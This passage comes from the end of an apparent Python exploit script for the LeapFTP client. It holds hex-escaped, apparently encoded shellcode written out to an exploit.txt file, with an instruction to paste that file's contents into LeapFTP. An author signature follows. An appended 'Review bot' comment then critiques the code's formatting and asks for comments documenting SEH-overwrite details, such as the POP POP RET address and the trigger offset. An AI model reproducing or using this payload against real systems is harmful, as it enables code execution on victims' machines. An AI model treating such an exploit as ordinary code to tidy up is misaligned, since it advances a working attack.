"\x36\x61\x4c\x4d\x4b\x35\x68\x39\x65\x50\x35\x50\x55\x50" +\
"\x70\x50\x52\x48\x76\x51\x6c\x4b\x62\x4f\x6c\x47\x79\x6f" +\
"\x6e\x35\x6f\x4b\x4a\x50\x4e\x55\x69\x32\x32\x76\x55\x38" +\
"\x79\x36\x6c\x55\x6f\x4d\x4d\x4d\x6b\x4f\x78\x55\x75\x6c" +\
"\x73\x36\x31\x6c\x57\x7a\x4b\x30\x79\x6b\x49\x70\x70\x75" +\
"\x64\x45\x4f\x4b\x63\x77\x37\x63\x62\x52\x52\x4f\x52\x4a" +\
"\x77\x70\x56\x33\x69\x6f\x4e\x35\x30\x63\x35\x31\x50\x6c" +\
"\x51\x73\x36\x4e\x45\x35\x44\x38\x33\x55\x53\x30\x41\x41"
f.write(shellcode)
f.flush()
f.close()
#copy contents of exploit.txt to your clipboard and then launch LeapFTP
<http://about.me/k3170makan>
Keith Makan <http://about.me/k3170makan>
about.me/k3170makan
<http://about.me/k3170makan>
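Review bot: As rendered, the msfencode comment wraps onto a second line that begins `-b \x00\x0a\x0d\xff` with no leading `#`, and the final four lines (the `<http://about.me/k3170makan>` signature) are not Python either; if these are in the committed file as shown it does not parse, so either the continuation needs a `#` and the trailer needs to go, or the rendering dropped the comment markers and that should be confirmed. The two four-byte constants are annotated with their role (`#JMP to payload`, `#POP POP RET`) but not with the module the `POP POP RET` address was taken from; a comment such as `# POP POP RET from <module name>, XP SP0 build` would make the "Tested on" note verifiable. The docstring after the header explains the disclosure policy but nothing documents `ovTrigger = 1093` beyond its name; a short `# bytes to the SEH record` style note would help.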